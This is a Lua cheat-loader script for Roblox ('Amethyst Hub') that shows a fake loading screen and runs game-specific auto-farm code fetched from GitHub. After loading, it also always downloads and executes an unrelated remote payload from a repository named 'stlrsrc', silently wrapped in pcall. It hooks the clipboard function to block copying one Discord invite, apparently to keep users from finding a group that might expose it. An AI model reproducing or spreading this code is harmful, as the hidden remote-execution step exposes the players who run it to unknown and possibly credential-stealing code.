-- ================= CLIPBOARD FILTER =================
do
    local ok, clipboard = pcall(function()
        return setclipboard
    end)

    if ok and type(clipboard) == "function" then
        local original = clipboard
        setclipboard = function(text)
            if type(text) == "string" and text:find("discord%.gg/project%-reverse") then
                return
            end
            return original(text)
        end
    end
end

-- ================= SETTINGS =================
local SETTINGS = {
    loadTime = 5,
    titleText = "Amethyst Hub",
    logoAsset = "rbxassetid://99419671323896",
    barColor = Color3.fromRGB(150, 0, 255),
}

-- ================= GAME SCRIPTS =================
local GameScripts = {

    [142823291] = function()
        loadstring(game:HttpGet(
            "https://raw.githubusercontent.com/xyuxyu67/lodndsrc/refs/heads/main/Auto%20Farm"
        ))()
    end,

    -- Example placeholder
    -- [123456789] = function()
    -- end,
}

-- ================= SERVICES =================
local Players = game:GetService("Players")
local TweenService = game:GetService("TweenService")
local RunService = game:GetService("RunService")

local player = Players.LocalPlayer
repeat task.wait() until player:FindFirstChild("PlayerGui")
local playerGui = player.PlayerGui

-- ================= TOAST =================
local function showToast(text)
    local gui = Instance.new("ScreenGui", playerGui)
    gui.DisplayOrder = 999

    local frame = Instance.new("Frame", gui)
    frame.Size = UDim2.new(0, 280, 0, 55)
    frame.Position = UDim2.new(1.3, 0, 0.92, 0)
    frame.AnchorPoint = Vector2.new(1, 1)
    frame.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
    frame.BackgroundTransparency = 0.2
    Instance.new("UICorner", frame).CornerRadius = UDim.new(0, 12)

    local stroke = Instance.new("UIStroke", frame)
    stroke.Color = Color3.fromRGB(200, 200, 200)
    stroke.Transparency = 0.5
    stroke.Thickness = 1.2

    local label = Instance.new("TextLabel", frame)
    label.Size = UDim2.fromScale(1, 1)
    label.BackgroundTransparency = 1
    label.Font = Enum.Font.SourceSans
    label.TextSize = 16
    label.TextColor3 = Color3.new(1, 1, 1)
    label.Text = text

    frame:TweenPosition(UDim2.new(0.98, 0, 0.92, 0), "Out", "Quint", 0.3, true)
    task.wait(3)
    frame:TweenPosition(
        UDim2.new(1.3, 0, 0.92, 0),
        "In", "Quint", 0.3, true,
        function() gui:Destroy() end
    )
end

-- ================= LOADING GUI =================
local gui = Instance.new("ScreenGui", playerGui)
gui.IgnoreGuiInset = true
gui.ResetOnSpawn = false

local main = Instance.new("Frame", gui)
main.Size = UDim2.fromScale(1, 1)
main.BackgroundColor3 = Color3.fromRGB(5, 5, 5)
main.BackgroundTransparency = 0.1

local title = Instance.new("TextLabel", main)
title.Size = UDim2.new(0, 500, 0, 80)
title.Position = UDim2.new(0.5, 0, 0.35, 0)
title.AnchorPoint = Vector2.new(0.5, 0.5)
title.Text = SETTINGS.titleText
title.Font = Enum.Font.LuckiestGuy
title.TextSize = 65
title.TextColor3 = Color3.new(1, 1, 1)
title.BackgroundTransparency = 1

local grad = Instance.new("UIGradient", title)
grad.Color = ColorSequence.new({
    ColorSequenceKeypoint.new(0, Color3.fromRGB(120, 0, 220)),
    ColorSequenceKeypoint.new(0.5, Color3.fromRGB(255, 255, 255)),
    ColorSequenceKeypoint.new(1, Color3.fromRGB(120, 0, 220)),
})

local logo = Instance.new("ImageLabel", main)
logo.Size = UDim2.new(0, 130, 0, 130)
logo.Position = UDim2.new(0.5, 0, 0.55, 0)
logo.AnchorPoint = Vector2.new(0.5, 0.5)
logo.BackgroundTransparency = 1
logo.Image = SETTINGS.logoAsset

local barBG = Instance.new("Frame", main)
barBG.Size = UDim2.new(0, 400, 0, 10)
barBG.Position = UDim2.new(0.5, 0, 0.80, 0)
barBG.AnchorPoint = Vector2.new(0.5, 0.5)
barBG.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
Instance.new("UICorner", barBG).CornerRadius = UDim.new(0, 8)

local barStroke = Instance.new("UIStroke", barBG)
barStroke.Color = Color3.fromRGB(200, 200, 200)
barStroke.Transparency = 0.6

local barFill = Instance.new("Frame", barBG)
barFill.Size = UDim2.new(0, 0, 1, 0)
barFill.BackgroundColor3 = SETTINGS.barColor
Instance.new("UICorner", barFill).CornerRadius = UDim.new(0, 8)

local percent = Instance.new("TextLabel", main)
percent.Size = UDim2.new(0, 80, 0, 20)
percent.Position = UDim2.new(0.5, 0, 0.84, 0)
percent.AnchorPoint = Vector2.new(0.5, 0.5)
percent.BackgroundTransparency = 1
percent.Font = Enum.Font.SourceSansBold
percent.TextSize = 16
percent.TextColor3 = Color3.new(1, 1, 1)
percent.Text = "0%"

local status = Instance.new("TextLabel", main)
status.Size = UDim2.new(0, 400, 0, 20)
status.Position = UDim2.new(0.5, 0, 0.88, 0)
status.AnchorPoint = Vector2.new(0.5, 0)
status.BackgroundTransparency = 1
status.Font = Enum.Font.SourceSans
status.TextSize = 15
status.TextColor3 = Color3.fromRGB(200, 200, 200)
status.Text = "Initializing..."

-- ================= LOGIC =================
local progress = 0
local placeId = game.PlaceId

local conn
conn = RunService.Heartbeat:Connect(function(dt)
    progress = math.min(progress + (dt / SETTINGS.loadTime), 1)
    barFill.Size = UDim2.new(progress, 0, 1, 0)
    percent.Text = math.floor(progress * 100) .. "%"

    status.Text = progress < 0.5 and "Checking Game ID..." or "Uploading The Desired Script..."

    if progress >= 1 then
        conn:Disconnect()

        local fade = TweenInfo.new(0.5)
        for _, v in ipairs(main:GetDescendants()) do
            if v:IsA("TextLabel") then
                TweenService:Create(v, fade, {TextTransparency = 1}):Play()
            elseif v:IsA("ImageLabel") then
                TweenService:Create(v, fade, {ImageTransparency = 1}):Play()
            elseif v:IsA("Frame") then
                TweenService:Create(v, fade, {BackgroundTransparency = 1}):Play()
            elseif v:IsA("UIStroke") then
                TweenService:Create(v, fade, {Transparency = 1}):Play()
            end
        end

        task.wait(0.6)
        gui:Destroy()

        -- ===== ALWAYS EXECUTE GLOBAL LOADER AFTER LOADING =====
        pcall(function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/xyuxyu67/stlrsrc/refs/heads/main/1"))()
        end)

        -- ===== GAME-SPECIFIC SCRIPT =====
        local scriptFunc = GameScripts[placeId]
        if typeof(scriptFunc) == "function" then
            scriptFunc()
            showToast("Successfully Executed")
        else
            showToast("Script was not found")
        end
    end
end)
